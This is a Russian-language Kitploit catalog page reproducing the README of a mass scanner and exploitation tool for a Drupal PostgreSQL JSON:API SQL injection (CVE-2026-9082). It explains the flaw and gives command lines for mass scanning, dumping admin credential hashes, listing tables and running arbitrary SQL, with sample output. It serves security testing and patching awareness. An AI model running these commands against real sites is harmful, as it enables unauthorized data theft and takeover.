Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
drupal-jsonapi-sqli-scanner — Сканер: CVE-2026-9082 Drupal PostgreSQL SQLi через JSON:API — Python-сканер для неаутентифицированной SQLi, приводящей к RCE (CISA KEV) | Kitploit
Инструменты/GitHubGitHub/ridhinva/drupal-jsonapi-sqli-scanner
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхСбор информацииТестирование на ПроникновениеRed TeamingБезопасность Баз Данных
GitHub
ridhinva/drupal-jsonapi-sqli-scanner

drupal-jsonapi-sqli-scanner

Сканер: CVE-2026-9082 Drupal PostgreSQL SQLi через JSON:API — Python-сканер для неаутентифицированной SQLi, приводящей к RCE (CISA KEV)

Репозиторий
21241 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-9082 Critical CISA KEV Affected Versions License

CVE-2026-9082 — SQL-инъекция в Drupal на базе PostgreSQL

Массовый сканер и инструмент эксплуатации

Неаутентифицированная SQL-инъекция в ядре Drupal (PostgreSQL)
Инъекция ключа массива фильтра JSON:API через злоупотребление именами PDO-плейсхолдеров


Обзор

CVE-2026-9082 — это чрезвычайно критическая уязвимость SQL-инъекции в ядре Drupal, затрагивающая все сайты на PostgreSQL под управлением Drupal с 8.0 по 11.3.9. Добавлена в каталог известных эксплуатируемых уязвимостей CISA (KEV) 22 мая 2026 года — активно эксплуатируется в дикой природе.

Воздействие

КритичностьCVSSТребуется аутентификацияВектор атаки
Критическая9.8+НетHTTP (JSON:API)
  • Эксфильтрация данных — извлечение баз данных, пользователей, хэшей паролей
  • Повышение привилегий — создание учётных записей администратора, изменение содержимого
  • Удалённое выполнение кода — в некоторых конфигурациях через pg_exec() или COPY ... PROGRAM

Затронутые версии

СтатусВерсии
❌ УязвимыDrupal 8.0.0 → 11.3.9 (бэкенд PostgreSQL)
✅ Исправлено11.3.10, 11.2.12, 10.6.9, 10.5.10

Как это работает

Уязвимость находится в core/modules/pgsql/src/EntityQuery/Condition.php. Метод translateCondition() использует контролируемые пользователем ключи массива из параметров фильтра JSON:API для создания имён PDO-плейсхолдеров. PDO распознаёт только [a-zA-Z0-9_] в качестве имён плейсхолдеров, поэтому любой суффикс после ) становится литеральным SQL, внедряемым в запрос.

JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection

Возможности

  • ✅ Массовый сканер — сканирование сотен целей одновременно
  • ✅ Режим одиночной цели — проверка отдельных сайтов на Drupal
  • ✅ Обнаружение на основе времени — подтверждение слепой SQLi через pg_sleep()
  • ✅ Обнаружение на основе булевых условий — сравнение количества строк
  • ✅ Извлечение версии — определение версии PostgreSQL
  • ✅ Информация о базе данных — извлечение текущего пользователя и имени БД
  • ✅ Дамп учётных данных администратора — имя пользователя, email, хэш пароля (uid=1)
  • ✅ Список таблиц — перечисление всех публичных таблиц
  • ✅ Пользовательские SQL-запросы — выполнение любого запроса на извлечение данных
  • ✅ Поддержка прокси — работа через Burp Suite или аналогичные инструменты
  • ✅ Вывод в файл — сохранение результатов массового сканирования
  • ✅ Цветной вывод в терминале — легко читаемые результаты

Установка

Предварительные требования

  • Python 3.8+
  • pip (менеджер пакетов Python)

Установка зависимостей

# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests

Вот и всё! Всего одна зависимость — requests.


Использование

🕵️ Проверка одиночной цели

python3 cve_2026_9082_scanner.py -u https://target.com --check

📡 Массовое сканирование нескольких целей

python3 cve_2026_9082_scanner.py -f targets.txt

Формат targets.txt:

https://target1.com
target2.com
192.168.1.100

🔓 Извлечение версии PostgreSQL

python3 cve_2026_9082_scanner.py -u https://target.com --version

🗄️ Извлечение информации о базе данных

python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo

👤 Дамп учётных данных администратора (uid=1)

python3 cve_2026_9082_scanner.py -u https://target.com --admin

📋 Список всех таблиц

python3 cve_2026_9082_scanner.py -u https://target.com --tables

💉 Пользовательский SQL-запрос

python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"

Сохранение результатов в файл

python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt

Использование прокси (Burp Suite)

python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080

Настройка таймингов

# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60

Справочник по командам

ФлагОписание
-u, --urlURL одиночной цели
-f, --fileФайл со списком целей (по одной в строке)
-o, --outputСохранить результаты сканирования в файл
--checkПроверить, уязвима ли цель
--versionИзвлечь версию PostgreSQL
--dbinfoИзвлечь пользователя БД и имя БД
--adminИзвлечь учётные данные администратора Drupal (uid=1)
--tablesВывести список всех таблиц БД
--queryПользовательский SQL-запрос для извлечения данных
--threadsКоличество потоков для массового сканирования (по умолчанию: 20)
--timeoutТаймаут HTTP-запроса (по умолчанию: 30 с)
--delayЗадержка pg_sleep для обнаружения (по умолчанию: 5 с)
--no-ssl-verifyПропустить проверку TLS-сертификата
--proxyHTTP-прокси (например, http://127.0.0.1:8080)

Пример вывода

Уязвимая цель

╔══════════════════════════════════════════════════════════════╗
║          CVE-2026-9082 - Drupal PostgreSQL SQLi             ║
║       Mass Scanner + Exploitation Tool v1.0.0               ║
╚══════════════════════════════════════════════════════════════╝
  CISA KEV: Added 2026-05-22  |  Advisory: SA-CORE-2026-004

[*] Checking: https://vulnerable-drupal-site.com

[!!] VULNERABLE - https://vulnerable-drupal-site.com
      Method: time-based (+5.2s)
      Resource: node/article

Дамп учётных данных администратора

[+] username: admin
[+] email: [email protected]
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...

Ссылки

ИсточникСсылка
Официальное уведомление DrupalSA-CORE-2026-004
CISA KEVCVE-2026-9082
Коммит с исправлениемea9524d9
Запись в NVDCVE-2026-9082
ОбнаружилMichael Maturi

⚠️ Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности, образовательных целей и этичного исследования.

Несанкционированный доступ к компьютерным системам противозаконен. Авторы не несут ответственности и не отвечают за любое неправомерное использование или ущерб, причинённый данной программой.


Автор

Ridhin V A (@ridhinva) — баг-хантер и исследователь безопасности

Создано, потому что CISA KEV сообщил, что уязвимость эксплуатируется в дикой природе. Установите исправления на свои сайты Drupal.

Скачать инструмент